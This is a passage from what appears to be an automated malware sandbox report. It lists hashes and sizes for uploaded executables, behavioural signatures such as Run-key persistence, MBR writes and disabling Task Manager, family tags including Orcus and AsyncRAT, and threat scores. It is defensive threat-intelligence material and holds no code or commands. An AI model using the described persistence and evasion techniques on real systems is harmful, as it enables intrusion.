
      1b83a6f8956ec912d04e30591e6c0026

    • SHA1

      6e56d558efb40697afb669fd40100cd007deeeec

    • SHA256

      c164cd72d5927e12bbfa5946b3f9526e27bfe37b1d57fc595c3eb3e94c40b395

    • SHA512

      35e70cdadf7d80072b8092c6ea4e66d73e6f4b0d78f9a3079d3efdb40f305c58aa8865d8664698249d3ab1d0be4f3afabf02c9ac84398fa50d4e3aba350de8be

    • SSDEEP

      12288:2//ZbUXN0kCD9pZ4QQxCQDrX2t9xqkHE7/:23Zbm0BZvQxCgrXS9fo

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/8e751b8765f733f3f7682fd1247a27a70.exe

    • Size

      489KB

    • MD5

      2a4b8fa83e620ebb4fc21488efc16bbe

    • SHA1

      cfc0f3c3a5b015ac235d98245c9d5633749cce38

    • SHA256

      aa169fb465a49976694ffa3d8795d73dab23bc3e11209ddc70aa07577e675d4b

    • SHA512

      647b8ee84ea10262e29307a9ba7b3a055bab4211ce801cf22baf264cd8507533d7370ef1ec12e5576c129b20ee3d547fa06c005722a181e8f226855d5a3560ba

    • SSDEEP

      12288:grxZ//3SfgfZCgOAZw+i+vwnPWybFxJ8fkw:gtZ/VCgOAnAb+l

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/8f6b416bb42a3f168bf083c67687bd533.exe

    • Size

      162KB

    • MD5

      cadd9f366736a8c6a36e6f092672217c

    • SHA1

      3d75c189ebbf5066c66e16c15e92f249925e95d0

    • SHA256

      12087c047dbf2d70e90611276bcb454052ab21643806d90ef2873fd050a97759

    • SHA512

      7caf3555e36fa73f19b6919b0695a3003ab734105550847cba112b9ac69133235edd0b41110d0361a45a94f171debad8afd4f45613e76b1eda95331e7575e17e

    • SSDEEP

      3072:tLzOI+8oz3Y+u1gb2KoTJBJsHZ4AYsRmwRCRJJI3itUWJNesifV:tH2zTu1gbAvMZ4A9RPLpD

    Score
    3/10
    • Target

      uploaded/93h9j2xi5z-safety.exe

    • Size

      191KB

    • MD5

      52460816c25831fd3af5874295804258

    • SHA1

      57465181cc7ac631b6dc2c5af016751ba48f7211

    • SHA256

      08cfd565e6c1b0df6b97b2f0d4a1db78726d3fee08409d05fc628aeb7218a8df

    • SHA512

      ad6b6e92c37575af4d0bdf51faea8b5ea81698494ecd343f8495ceb662fbe0a6a8c5e3caf2e7fb52055dab92ba3d83bb8e22528989f4c7c02a92abfdfed92d61

    • SSDEEP

      1536:gLuVjANSoxkARpL2uZhRmod5LZLK1VmTf:gwjANH4OmmRjj

    Score
    3/10
    • Target

      uploaded/93h9j2xi5z.exe

    • Size

      195KB

    • MD5

      442e1bca83142fd1bea2ba9981e5a879

    • SHA1

      58ff6e1a61419242e5d3f5d23b5ae674b4424b2c

    • SHA256

      043d231d940ab029f8325d828de3b02c13db7df44cbbe4f062068296e2e193a5

    • SHA512

      365363000faf521319801f883e58bf8072d7106929687a59a84d78a8fa68bbd6ffacbeb7600d8721031ca6b883ec691b33d7227434d7c1442608176746e10d31

    • SSDEEP

      1536:WApeiDam0X6krbcTn2uZhRmod5LZLK1VmTf:WAVDam0hbcT2OmmRjj

    • Disables RegEdit via registry modification

    • Disables Task Manager via registry modification

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

    • Target

      uploaded/AC27_Build3001-UP7-K.exe

    • Size

      764KB

    • MD5

      785382bfcb2e6d9846c103eeb100d17f

    • SHA1

      315342b99c45e1519756bfc496fca8fc88a9fc54

    • SHA256

      e1c91d5cf10150965a98834642fd7c3cefb83cbb8a30e6edcb409641d0da46f3

    • SHA512

      13cda7b0d08062f7b9aae6d3e626d1c4e2e23e2dae18ef6b94dd91f9e5f42214450224d72eac111c6702fed28e4d94363d2d35da09ac6720c61cd622a24d2125

    • SSDEEP

      12288:fZJIvntAvasMjvHQFSZT7vGDZXn2nsoemhygU/uAB5+E84YEaJbnrpp:7IPtaMjvQEJ7u9XnGsYxyuADyuw/H

    Score
    6/10
    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Target

      uploaded/ATR Tool 2.0.exe

    • Size

      2.5MB

    • MD5

      8be31e9bba7de582c4854c683b5aa4be

    • SHA1

      fc76bc8de33392f0ae36efca8a504afcd9ffe945

    • SHA256

      239a024acf03ff8106556ffd3784b9142c6d51611634a035505da705c725987b

    • SHA512

      762abb103a77e6f1fd790c587df5393fb4877d7f71481eeb2061c0f051f54bedee1491d0dc907088e6270aabfda9bbe10d64bb3ba91439b4e29b04d62edbf360

    • SSDEEP

      49152:sDYyMKjoIA7QURY8EoS0uhLh5dpTmX//u86ofe7ecL9wkC4JO75/IkSR:QFMKjnWUoShVppKX/pPCechwke7BDa

    Score
    7/10
    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

MITRE ATT&CK Enterprise v16

Tasks

static1

upxmacromacro_on_actionroblox script injectornewemvlatestratdefaultaspackv2noob nonameorcusasyncratneshtadarkcometmodiloaderxwormnanocoreumbral
Score
10/10

behavioral1

discoverypersistence
Score
7/10

behavioral2

discoverypersistenceupx
Score
7/10

behavioral3

discoveryupx
Score
5/10

behavioral4

Score
6/10

behavioral5

orcusdiscoveryratspywarestealer
Score
10/10

behavioral6

discoveryupx
Score
5/10

behavioral7

bootkitdiscoverypersistenceupx
Score
6/10

behavioral8

Score
1/10

behavioral9

execution
Score
10/10

behavioral10

Score
10/10

behavioral11

orcusdiscoveryratspywarestealer
Score
10/10

behavioral12

execution
Score
10/10

behavioral13

discovery
Score
3/10

behavioral14

discovery
Score
7/10

behavioral15

discoveryupx
Score
5/10

behavioral16

discovery
Score
3/10

behavioral17

execution
Score
8/10

behavioral18

discovery
Score
5/10

behavioral19

discoverypersistenceupx
Score
7/10

behavioral20

bootkitdiscoverypersistenceupx
Score
6/10

behavioral21

execution
Score
10/10

behavioral22

discoveryupx
Score
5/10

behavioral23

discovery
Score
7/10

behavioral24

discoverypersistenceupx
Score
7/10

behavioral25

discoveryupx
Score
5/10

behavioral26

discoverypersistenceupx
Score
7/10

behavioral27

discoverypersistenceupx
Score
7/10

behavioral28

discovery
Score
3/10

behavioral29

discovery
Score
3/10

behavioral30

bootkitdefense_evasiondiscoverypersistence
Score
8/10

behavioral31

discovery
Score
6/10

behavioral32

discovery
Score
7/10